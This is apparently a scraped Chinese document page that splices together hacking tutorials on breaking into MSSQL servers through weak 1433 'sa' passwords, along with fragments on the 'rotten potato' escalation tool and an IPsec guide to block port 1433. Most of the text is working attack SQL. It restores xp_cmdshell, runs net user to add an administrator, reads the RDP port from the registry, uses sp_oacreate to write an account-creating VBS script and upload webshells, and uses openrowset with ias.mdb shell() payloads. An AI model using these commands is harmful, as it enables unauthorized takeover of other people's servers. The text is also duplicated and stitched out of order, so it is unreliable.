这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了,当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权,但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上传无法成功,这条路走不通了,这时就考虑用到工具的文件管理功能了看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看sql的安装路径里的xplog70.dll文件是否存在看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西d盘下有几个网站和几个论坛,这些都是有用的信息,一旦sql的错误无法恢复的时候,我们就可以考虑通过这些网站来进行提权了,网站的提权,我就是搞不定,痛苦啊==!!继续搜索在e盘下竟然有个sql2000的原始安装文件备份,怦然心动的感觉是美妙的,感谢我们亲爱的服务器管理员大人,看看这是什么====e:\备份软件\MS Sql 2000\DEVELOPER\X86\BINN\那我们就开始恢复试试吧,切换到sql命令项,输入指令exec sp_dropextendedproc 'xp_cmdshell' //这个指令是删除sql数据库的xp_cmdshell的存储过程接着输入指令,重新加载新路径的存储过程。

烂土豆提权用法

烂土豆提权用法

烂土豆提权用法烂土豆提权用法作为一个技术工作者,在应对各种复杂的安全问题时,我们需要充分利用我们的知识和技能。

而烂土豆,作为一种常见的提权工具,其实也是我们日常工作中不可或缺的一部分。

在本文中,我们将按照类别介绍烂土豆的主要使用方法。

一、初探烂土豆烂土豆是一款Windows下可执行程序,主要针对Windows操作系统中的提权漏洞。

同时,烂土豆还可以通过网络将攻击对象的权限提升到管理员级别。

因此,烂土豆在渗透测试和黑客攻击中被广泛使用。

二、代码注入利用烂土豆进行代码注入是一种常见的提权方式。

当攻击者能够在操作系统中运行自己的代码时,他们就可以利用自己的特权执行恶意的操作。

这种方法通常使用附加功能劫持和DLL劫持,通常使用应用程序的漏洞进行注入。

三、密码获取烂土豆还可以通过获取Windows系统中的密码来进行提权。

攻击者可以使用hashdump功能来获取用户的密码哈希值,然后使用rainbow tables或其他暴力破解工具生成密码。

同时,烂土豆还可以查找Windows系统中保存的密码,取得密码后,攻击者可以使用提权工具来获取管理员权限。

四、漏洞利用烂土豆还可以利用Windows系统中存在的漏洞来获取管理员权限。

在Windows操作系统中,常常存在一些未经修补的漏洞。

攻击者可以通过利用这些漏洞来快速获取管理员权限。

烂土豆允许攻击者利用Windows系统中的一些漏洞进行提权。

这些漏洞的特性是允许攻击者以管理员身份运行。

五、总结烂土豆作为一款常用的提权工具,在Windows渗透测试和黑客攻击中发挥了巨大的作用。

攻击者可以使用烂土豆来获取管理员权限,并执行恶意的操作。

最好的防御方法是保持操作系统和应用程序更新,并采取其他预防措施,如防火墙和恶意软件检测。

只有这样,才能有效地保护我们的计算机安全。

总之,烂土豆是一款功能强大的提权工具,攻击者可以通过多种方式将其应用于渗透测试和黑客攻击中。

希望我们在日常工作中,注意加强计算机安全防护,避免遭受攻击,保护计算机系统的安全。

1433之黑吃黑杀手锏-沙盒模式提权

1433之黑吃黑杀手锏-沙盒模式提权

很多情况下,到这里应该执行会成功了,dllcache\下的net net1 一般人不会去禁用。
如果,连dllcache\目录下的net net1都被禁用 用户添加不了 又该怎么办?
························
依照是我 ,我会用c:\windows\system32\ias\ias.mdb 来调用system32下的xcopy.exe来执行命令 ,先说说xcopy是干什么用的 xcopy命令可以用来复制替换文件。
1433好扫,但是难入侵啊!
不是127错误,就是命令被禁用。 不是缺少哪个DLL文件,就是126错误。
哈,甚至连映像劫持、asshell、jobshell、seshell全部都使用不了,甚至SQL语句读写注册表都不行,该如何办?
select * from openrowset(&#39;microsoft.jet.oledb.4.0&#39;,&#39;;database=c:\windows\system32\ias\ias.mdb&#39;,&#39;select shell(&quot;net user user pass /add&quot;)&#39;)
···总算打字完了,,,我没有服务器做实验,所以没有图片 只有文字······
我已经做尽力的解释了,但是肯定还有人看不懂。那只能慢慢去读了。
现在没用cmd.exe了 直接利用c:\windows\system32\ias\ias.mdb来调用net 来添加用户。在net.exe没被禁用的情况下,很多的机子是可以添加成功的,接下来
select * from openrowset(&#39;microsoft.jet.oledb.4.0&#39;,&#39;;database=c:\windows\system32\ias\ias.mdb&#39;,&#39;select shell(&quot;net localgroup administrators user /add&quot;)&#39;) 就OK了

关闭1433端口保障安全

关闭1433端口保障安全
3.在安全通信要求页面,不选择"激活默认响应规则"。下一步。
4.在完成页面,选择"编辑属性"。完成。
5.在"拒绝对tcp1433端口的访问属性"对话框
中进行设置。首先设置规则:
1)单击下面的"添加 "按钮,启动安全规则向导。跳过欢迎页面,下一步。
2)在隧道终结点页面,选择默认的"此规则不指定隧道"。下一步。
7)完成。关闭IP筛选器列表对话框。会发现tcp1433IP筛选器出现在IP筛选器列表中。
4.选择"管理筛选器操作"标签,创建一个拒绝操作:
1)单击"添加"按钮,启动"筛选器操作向导",跳过欢迎页面,下一步。
2)在筛选器操作名称页面,填写名称,这儿填写"拒绝"。下一步。
3)在筛选器操作常规选项页面,将行为设置为"阻止"。下一步。
7)在完成页面,不选择"编辑属性",确定。
6.关闭"拒绝对tcp1433端口的访问属性"对话框。
三.指派和应用IPsec安全策略
1.缺省情况下,任何IPsec安全策略都未被指派。首先我们要对新建立的安全策略进行指派。在本地安全策略MMC中,右击我们刚刚建立的""拒绝对tcp1433端口的访问属性"安全策略,选择"指派"。
2.右击"Ip安全策略,在本地机器",选择"管理 IP 筛选器表和筛选器操作",启动管理 IP 筛选器表和筛选器操作对话框。我们要先创建一个IP筛选器和相关操作才能够建立一个相应的IPsec安全策略。
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

1433端口提权的过程随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。

插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=()广告完毕。

把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录显示错误信息:Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。

原因: 126(找不到指定的模块。

)。

这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了,当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权,但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上传无法成功,这条路走不通了,这时就考虑用到工具的文件管理功能了看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看sql的安装路径里的xplog70.dll文件是否存在看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西d盘下有几个网站和几个论坛,这些都是有用的信息,一旦sql的错误无法恢复的时候,我们就可以考虑通过这些网站来进行提权了,网站的提权,我就是搞不定,痛苦啊==!!继续搜索在e盘下竟然有个sql2000的原始安装文件备份,怦然心动的感觉是美妙的,感谢我们亲爱的服务器管理员大人,看看这是什么====e:\备份软件\MS Sql 2000\DEVELOPER\X86\BINN\那我们就开始恢复试试吧,切换到sql命令项,输入指令exec sp_dropextendedproc 'xp_cmdshell' //这个指令是删除sql数据库的xp_cmdshell的存储过程接着输入指令,重新加载新路径的存储过程。

dbcc addextendedproc ("xp_cmdshell","e:\备份软件\MS Sql2000\DEVELOPER\X86\BINN\xplog70.dll")不用理会下面提示的error Message信息,再去列目录试试,看看是否成功了接着当然是net user 添加用户提权了,cmd命令没有被限制,添加成功,忘记查看下端口了sql命令:exec master..xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'汗啊~~终端端口竟然被改成52981了,下面去开终端用刚建的帐号登录试试了授渔之<从1433弱口令到webshell>前两天给大家做了个1433恢复提权的教程,反响不错,今天再给大家带来个1433提权拿w ebshell的教程。

由于本人对webshell提权属于bc一类,本讲只讲如果通过1433弱口令到拿到webshell,请谅解,本教程无什么技术含量,请高手不要见笑,本实例讲解,原创于=华夏黑客同盟论坛=().本实例教程使用到的工具:SQL TOOLS 2.0Isqlw分离器修正版某人的小马一只,被我加工过一点^_^洪儿制作的大马一只,在SQL TOOLS 2.0的工具中填写扫到的ip连接,运行dos列目录命令提示Error Message:xpsql.cpp: 错误5 来自CreateProcess(第737 行)这个错误的原因比较复杂,有时是cmd命令被删除,有时是cmd命令的权限被限制,等等原因吧,恢复的可能性很小,具体的,我也没研究透彻,留待以后再探讨了,或者有大牛知道的,告诉我学习一下。

收集下服务器的信息,sql指令输入EXEC xp_msver服务器是个win2003两核1.5G等相关信息都显示出来了。

下面我们考虑下其他方法,另辟蹊径吧,使用文件管理功能查询个个磁盘下的文件有没有什么可以利用来提权的有幸在D盘下发现了一个wwwroot的目录,这个目录一般为服务器里存放网站的目录,进去看看了,发现了几个网站那就去收集下里面网站的信息吧,在目录里的找到了网站的域名等相关信息,网站为a sp+MSsql的网站,下面考虑传个小马到这个网站根目录去。

我传小马的方法,有点特别,我来给你慢慢讲解,由于服务器限制了上传功能,sqltool s的上传功能无法实现,只好考虑通过sql分离器来上传了,这个上传命令很多人曾用来创建用户提权,我试过了,无法提上来,只好另做他用了。

代码:declare @o int, @f int, @t int, @ret intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.N ETWORK")'exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&puterName 'exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,gro up")'exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","test")'exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo 'exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) 'exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'我的小马就是通过这个写入功能来改造上传的,小马我等下发出来。

废话说了很多了,再说明一点,这个上传需要到的sql的存储过程为sp_oacreate和sp_ oamethod这两个,如果这两个存储过程被禁用了,那就想办法恢复了,恢复的思路和上次教程一样。

提示命令已经完成,我们试试连接小马试试连接成功,填好上传路径及文件名,下面填好要上传大马的内容提示yes,那么就是上传成功了连接下大马看看这样就得到了网站的webshell了,具体怎么提权,会的人应该很容易搞定的,我也正在学习中本文只是揭示下通过1433的弱口令能做很多事,不能恢复的,我们可以通过其他途径来提权。

我想玩这个脑子要灵活,思路要开阔,菜鸟的菜文就写到这里了。

谢谢授渔之1433弱口令利用shift功能巧妙提权这是第三次发有关1433弱口令的教程了,前面两次教程也针对1433的修复和提权进行了详细的讲解,今天依然给大家带来一个1433弱口令的提权方法。

说是巧妙,其实很多大牛早就在使用了,本教程旨在对初学1433弱口令提权的菜鸟们,高手请无视。

连接弱口令主机随便运行个dos命令,看到错误提示:Error Message:xpsql.cpp: 错误5 来自CreatePr ocess(第737 行)上一期教程的服务器也是这个错误,我们绕过错误去拿webshell,是寻找服务器上的网站,利用分离器传小马,再传大马。

这期我们就讲下这个错误产生的原因,以及巧妙的修复其实也可以说是绕过他来提权。

错误5是个系统提示的错误号,CreateProcess这个是创建线程的意思,这个错误产生和系统文件cmd.exe有很大的关系,一种情况是cmd被删除,一种是cmd的权限被降低了。

(如果我这种说法有什么错误,请高手指出一下,本人理解的是这样)。

去windows\system32目录和sql的安装目录去看看,是否需要的文件都在cmd.exe存在odsole70.dll存在,为什么要看这个文件是否存在?因为我们等下要用到的存储过程需要到这个文件。

下面先查看下终端端口及开放情况sql指令输入exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Contr ol\Terminal Server\WinStations\RDP-Tcp','PortNumber'返回成功,终端端口为78打开3389连接命令mstsc连接IP:78 出现登录界面,证明78端口是对外开放的。

相关文档
最新文档